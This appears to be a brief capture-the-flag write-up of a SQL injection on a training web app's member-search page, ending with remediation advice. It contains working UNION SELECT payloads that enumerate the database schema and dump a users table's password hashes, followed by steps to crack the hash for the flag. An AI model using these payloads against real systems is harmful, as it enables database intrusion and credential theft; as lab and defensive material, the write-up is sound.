use SQL Injection && Cryptographic Failures
Process:
    - Go to SEARCH MEMBER BY ID
    - 1 UNION SELECT null, schema_name FROM information_schema.schemata -- 
    - 1 UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema = CHAR(77,101,109,98,101,114,95,83,113,108,95,73,110,106,101,99,116,105,111,110) -- 
    - 1 UNION SELECT null, column_name FROM information_schema.columns WHERE table_name = CHAR(117,115,101,114,115) --
    - 1 UNION SELECT Commentaire, countersign FROM users -- 
    - Decrypt this password -> then lower all the char. Sh256 on it and it's good ! (5ff9d0165b4f92b14994e5c685cdce28)
    - Get the flag

Secure:
    - Use prepare request for SQL
    - Check that there is only data and not commands in input for SQL
    - Use Cryptographic tools advance (bcrypt)